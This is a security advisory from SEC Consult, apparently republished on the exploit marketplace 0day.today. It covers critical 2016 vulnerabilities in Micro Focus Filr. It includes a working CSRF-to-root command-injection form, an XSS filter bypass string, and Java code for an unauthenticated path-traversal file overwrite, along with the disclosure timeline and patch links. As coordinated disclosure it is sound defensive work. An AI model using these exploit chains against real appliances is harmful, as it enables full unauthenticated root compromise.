0day.today - Ce-a mai mare baze de date de exploit-uri din lume.
Lucrui care ar trebui să le ști despre noi:
Folosim un singur domeniu DOMAIN_LINK
Dacă dorești să cumperi un exploit sau să platești pentru un serviciu, trebuie să cumperi Gold. Nu dormim să folosim site-ul pentru scopuri informatice negative (hacking), prin urmare orice tip de acțiune de hacking care poate afecta ilegal alți utilizatori sau pagini web la care nu ești proprietar va fi pedepsită cu blocarea contului permanentă incluzand distrugerea datelor tale care aparțin de cont.
Administrația acestui website folosește adresele oficiale de contact. Atenție la impostori!
Folosim un singur domeniu DOMAIN_LINK
Dacă dorești să cumperi un exploit sau să platești pentru un serviciu, trebuie să cumperi Gold. Nu dormim să folosim site-ul pentru scopuri informatice negative (hacking), prin urmare orice tip de acțiune de hacking care poate afecta ilegal alți utilizatori sau pagini web la care nu ești proprietar va fi pedepsită cu blocarea contului permanentă incluzand distrugerea datelor tale care aparțin de cont.
Administrația acestui website folosește adresele oficiale de contact. Atenție la impostori!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Citiți [ acordul ]
- Citiți [ trimite ] reguli
- Vizitați [ Întrebări frecvente. ] pagină
- [ Înregistrare ] profil
- Obține [ GOLD ]
- Dacă dorești să [ vinzi ]
- Dacă dorești să [ cumperi ]
- Dacă ați pierdut [ cont-ul vizitați această pagină. ]
- Orice întrebări [ [email protected] ]
- Pagină de autorizare
- Pagină de Înregistrare
- Pagină de restaurare a unui cont
- Pagina FAQ
- Pagina de contact
- Regulamentul pentru post-uri
- Pagina de acorduri
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Ne puteți contacta prin:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Micro Focus Filr 2 2.0.0.421, Filr 1.2 1.2.0.846 - Multiple Vulnerabilities
Autor
Risc
[
Nivel de securitate mare
]0day-ID
Categorie
Data
CVE
Platformă
title: Multiple vulnerabilities product: Micro Focus (former Novell) Filr Appliance vulnerable version: Filr 2 <=2.0.0.421, Filr 1.2 <= 1.2.0.846 fixed version: Filr 2 v2.0.0.465, Filr 1.2 v1.2.0.871 CVE number: CVE-2016-1607, CVE-2016-1608, CVE-2016-1609 CVE-2016-1610, CVE-2016-1611 impact: critical homepage: https://www.novell.com/products/filr/ found: 2016-05-23 by: W. Ettlinger (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Bangkok - Berlin - Linz - Montreal - Moscow Singapore - Vienna (HQ) - Vilnius - Zurich https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "Unlike other mobile file access and collaborative file sharing solutions, Micro Focus Filr has been designed with the enterprise in mind, resulting in less administration, better security and more productive users." URL: https://www.novell.com/products/filr/ Business recommendation: ------------------------ During a very quick security check several vulnerabilities with high impact have been discovered. SEC Consult recommends to immediately apply the patches provided by Micro Focus to address these issues. Please note that since SEC Consult did not conduct a thorough technical security check SEC Consult cannot make a statement regarding the overall security of the Micro Focus Filr appliance. Vulnerability overview/description: ----------------------------------- During a quick security check several vulnerabilities have been identified that ultimately allow an attacker to completely compromise the appliance: 1) Cross Site Request Forgery (CSRF) - CVE-2016-1607 Several functions within the appliance's administative interface lack protection against CSRF attacks. This allows an attacker who targets an authenticated administrator to reconfigure the appliance. 2) OS Command Injection - CVE-2016-1608 The appliance administrative interface allows an authenticated attacker to execute arbitrary operating system commands. Please note that an attacker can combine this vulnerability with vulnerability #1. In this scenario, an attacker does not need to be authenticated. 3) Insecure System Design The appliance uses a Jetty application server to provide the appliance administration interface. This application server is started as the superuser "root". Please note that combined with vulnerability #1 and #2 an attacker can run commands as the superuser "root" without the need for any authentication. For vendor remark on #3 see solution section. 4) Persistent Cross-Site Scripting - CVE-2016-1609 The Filr web interface uses a blacklist filter to try to strip any JavaScript code from user input. However, this filter can be bypassed to persistently inject JavaScript code into the Filr web interface. 5) Missing Cookie Flags The httpOnly cookie flag is not set for any session cookies set by both the administrative appliance web interface and the Filr web interface. Please note that combined with vulnerability #4 an attacker can steal session cookies of both the appliance administration interface and the Filr web interface (since cookies are shared across ports). For vendor remark on #5 see solution section. 6) Authentication Bypass - CVE-2016-1610 An unauthenticated attacker is able to upload email templates. 7) Path Traversal - CVE-2016-1610 The functionality that allows an administrator to upload email templates fails to restrict the directory the templates are uploaded to. Please note that combined with vulnerability #6 an attacker is able to upload arbitray files with the permissions of the system user "wwwrun". 8) Insecure File Permissions - CVE-2016-1611 A file that is run upon system user login is world-writeable. This allows a local attacker with restricted privileges to inject commands that are being executed as privileged users as soon as they log into the system. Please note that combined with vulnerabilities #6 and #7 an unauthenticated attacker can inject commands that are executed as privileged system users (e.g. root) using the Filr web interface. Proof of concept: ----------------- 1, 2, 3) The following HTML fragment demonstrates that using a CSRF attack (#1) system commands can be injected (#2) that are executed as the user root (#3): ----- snip ----- <html> <body> <form action="https://<host>:9443/vaconfig/time" method="POST"> <input type="hidden" name="ntpServer" value="0.novell.pool.ntp.org 1.novell.pool.ntp.org';id>/tmp/test;'" /> <input type="hidden" name="region" value="europe" /> <input type="hidden" name="timeZone" value="Europe/Vienna" /> <input type="hidden" name="utc" value="true" /> <input type="hidden" name="_utc" value="on" /> <input type="submit" value="Submit request" /> </form> </body> </html> ----- snip ----- 4) The following string demonstrates how the XSS filter can be circumvented: <img src='>' onerror='alert(1)'> This string can e.g. be used by a restricted user in the "phone" field of the user profile. The script is executed by anyone viewing the profile (e.g. admins). 5) None of the session cookies are set with the httpOnly flag. 6, 7, 8) The following Java fragment demonstrates how an unauthenticated attacker (#6) can overwrite a file in the filesystem (#7 & #8) that is executed upon user login of e.g. the root user: ----- snip ----- String sessionCookie = "sectest"; String host = "http://<host>/"; ProxySettings settings = new ProxySettings(); HttpCookie cookie = new HttpCookie("JSESSIONID", sessionCookie); settings.setCookieManager(new CookieManager()); settings.getCookieManager().getCookieStore().add(new URI(host), cookie); settings.setModuleBaseUrl(host + "ssf/gwt/"); settings.setRemoteServiceRelativePath("gwtTeaming.rpc"); settings.setPolicyName("338D4038939D10E7FC021BD64B318D99"); GwtRpcService svc = SyncProxy.createProxy(GwtRpcService.class, settings); VibeXsrfToken token = new VibeXsrfToken( StringUtils.toHexString(Md5Utils.getMd5Digest(sessionCookie.getBytes()))); ((HasRpcToken) svc).setRpcToken(token); String fileName = "../../../../etc/profile.d/vainit.sh"; FileBlob fileBlob = new FileBlob(ReadType.TEXT, fileName, "", 1l, 4, 1l, false, 4l); fileBlob.setBlobDataString("id > /tmp/profiledtest\n"); BinderInfo folderInfo = new BinderInfo(); folderInfo.setBinderId((long) 1); folderInfo.setBinderType(BinderType.WORKSPACE); folderInfo.setWorkspaceType(WorkspaceType.EMAIL_TEMPLATES); VibeRpcCmd cmd = new UploadFileBlobCmd(folderInfo, fileBlob, true); HttpRequestInfo ri = new HttpRequestInfo(); svc.executeCommand(ri, cmd); ----- snip ----- Vulnerable / tested versions: ----------------------------- The version 2.0.0.421 of Micro Focus Filr was found to be vulnerable. This version was the latest version at the time of the discovery. According to the vendor, Filr 1.2 is also vulnerable. Vendor contact timeline: ------------------------ 2016-05-23: Sending encrypted advisory to [email protected], Setting latest possible release date to 2016-07-12 2016-05-24: Initial response from Micro Focus: forwarded the information to Filr engineering team 2016-06-13: Micro Focus releases patch to address issue #8 2016-06-14: Requested status update 2016-06-14: Micro Focus expects release of the patches in early July 2016-06-30: Asking for status update, answer of Micro Focus 2016-07-06: Micro Focus needs more time to patch issues, release re-scheduled for 15th 2016-07-12: Asking for status update; "final rounds of QA" at Micro Focus 2016-07-16: Postponing advisory release, patch not yet ready 2016-07-22: Patch release by Micro Focus 2016-07-25: Coordinated advisory release Solution: --------- The "Filr 2.0 Security Update 2" can be downloaded here and should be applied immediately: https://download.novell.com/Download?buildid=3V-3ArYN85I~ Those patches fix vulnerabilities #1, #2, #4, #6, #7 "Filr 1.2 Security Update 3" can be found here: https://download.novell.com/Download?buildid=BOTiHcBFfv0~ Knowledge base references at Micro Focus: Issue #1: https://www.novell.com/support/kb/doc.php?id=7017786 Issue #2: https://www.novell.com/support/kb/doc.php?id=7017789 Issue #4: https://www.novell.com/support/kb/doc.php?id=7017787 Issue #6 & #7: https://www.novell.com/support/kb/doc.php?id=7017788 Local privilege escalation via insecure file permissions (#8) has already been fixed in the Filr 2.0 security update 1 in June: https://www.novell.com/support/kb/doc.php?id=7017689 Issue #3: According to Micro Focus, Jetty actually runs as user "vabase-jetty" but will pass commands off to another service on the box that runs as root to perform privileged actions. They have fixed the command injection in this release and the next release will include much more stringent parameter validation for passing the commands. Issue #5: According to Micro Focus, a component of Filr does not function properly when the httpOnly flag is enabled. This will be addressed in a future release. # 0day.today [2024-07-02] #